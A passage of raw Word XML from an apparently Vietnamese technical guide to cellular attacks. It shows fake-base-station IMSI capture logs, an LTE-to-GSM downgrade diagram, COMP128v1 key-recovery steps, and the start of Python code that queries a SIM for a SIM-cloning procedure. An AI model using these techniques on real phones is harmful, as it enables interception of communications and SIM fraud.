        </w:rPr>
        <w:t xml:space="preserve">tail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/enb.log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"IMSI"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [INFO] [NAS]  New UE IMSI: 452040123456789</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [INFO] [NAS]  New UE IMSI: 452040987654321</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="50"/>
    <w:bookmarkStart w:id="51" w:name="downgrade-attack-4g-gsm"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.8 Downgrade Attack (4G → GSM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Fake eNodeB LTE                                    UE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                                               │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── SIB1 (MCC=452, MNC=04, TAC=7) ────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ RRC Connection Request ─────────────────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── RRC Connection Setup ─────────────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │◄─ NAS: Attach Request ─────────────────────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │    (IMSI=452040xxx nếu không có valid GUTI)    │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                                               │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── RRC Connection Release ───────────────────►│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   (redirectedCarrierInfo = ARFCN 60 GSM)      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │                                               │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    UE switches to GSM → Connects to OpenBTS         │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── GSM: RR → Identity Request → IMSI ──────────│</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    │── GSM: Auth disabled → A5/0 → plaintext ──────│</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="51"/>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="58" w:name="sim-cloning-intercept"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. SIM Cloning / Intercept</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="53" w:name="kiến-trúc-sim-card"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Kiến Trúc SIM Card</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SIM Card (UICC) Internal Structure:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  Operating System (CardOS/JCOP/NativeOS)             │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  ┌───────────┐  ┌───────────┐  ┌─────────────────┐  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  MF       │  │  DF_GSM   │  │  DF_TELECOM     │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │ (Master   │  │  EF_IMSI  │  │  EF_ADN (phonebook) │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  │  File)    │  │  EF_Ki    │  │  EF_SMS         │  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  └───────────┘  │  EF_LOCI  │  └─────────────────┘  │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                 │  EF_ACC   │                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                 └───────────┘                        │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│                                                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│  Crypto Engine:                                     │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│    ├── GSM: COMP128v1/v2/v3 (A3/A8 algorithms)      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│    ├── 3G/4G: MILENAGE (AES-128 based)              │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│    └── 5G: TUAK (Keccak-based)                      │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└─────────────────────────────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Giao tiếp: ISO/IEC 7816-4 (APDU protocol)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  CLA INS P1 P2 Lc [Data] Le</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  A0  88  00 00 10 [RAND] 00  → GSM Authentication (COMP128)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="lỗ-hổng-comp128v1-phân-tích-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Lỗ Hổng COMP128v1 – Phân Tích Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">COMP128v1 là triển khai cụ thể của thuật toán A3/A8 trên SIM GSM thế hệ đầu. Năm 1998, Marc Briceno, Ian Goldberg và David Wagner đã reverse-engineer thành công và chỉ ra lỗ hổng nghiêm trọng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cơ chế hoạt động bình thường:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu vào: Ki (128-bit, bí mật trong SIM) + RAND (128-bit, thử thách từ mạng)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Đầu ra: SRES (32-bit, xác nhận) + Kc (64-bit, khóa mã hóa)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">COMP128v1(Ki, RAND) → (SRES, Kc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Thuật toán sử dụng cấu trúc dữ liệu S-box 64×8 bit với pattern lặp lại, dẫn đến:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Partial information leakage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Mỗi response SRES tiết lộ vài bit thông tin về Ki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chosen-plaintext attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Với ~130,000–150,000 cặp (RAND, SRES), có thể khôi phục Ki bằng thuật toán statistical analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Giới hạn thực tế</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SIM thế hệ mới có</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">counter giới hạn số lần authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(thường 65,535). Tuy nhiên, một số SIM GSM cũ không có giới hạn này.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Thuật toán tấn công (mô tả cấp cao):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: Gửi 150,000 RAND khác nhau, thu 150,000 SRES</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: Phân tích collision trong SRES để suy ra partial Ki bits</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 3: Dùng meet-in-the-middle để hoàn thiện Ki</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Thời gian: ~8 tiếng với card reader tốc độ cao</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="quy-trình-sim-cloning-thực-tế"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Quy Trình SIM Cloning Thực Tế</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phần cứng cần thiết:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- USB Smart Card Reader (Gemalto, HID, v.v.)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Blank writable SIM (Magic SIM hoặc SIM emulator)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phần mềm:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SIM Authentication Analyzer</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Minh họa học thuật cho COMP128v1 chosen-plaintext attack</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> smartcard.System </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> readers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> smartcard.util </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> toHexString, toBytes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get_reader():</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    reader_list </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> readers()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reader_list:</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"Không tìm thấy card reader"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> reader_list[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].createConnection()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> gsm_authenticate(connection, rand_16bytes):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Gửi APDU GSM Authentication command đến SIM</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Command: A0 88 00 00 10 [16 bytes RAND]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Response: [4 bytes SRES] [8 bytes Kc] 90 00</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    apdu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x88</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</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(rand_16bytes)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    data, sw1, sw2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection.transmit(apdu)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sw1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x9F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cần GET RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        get_resp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xA0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xC0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, sw2]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        data, sw1, sw2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection.transmit(get_resp)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sw1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x90</w:t>
      </w:r>
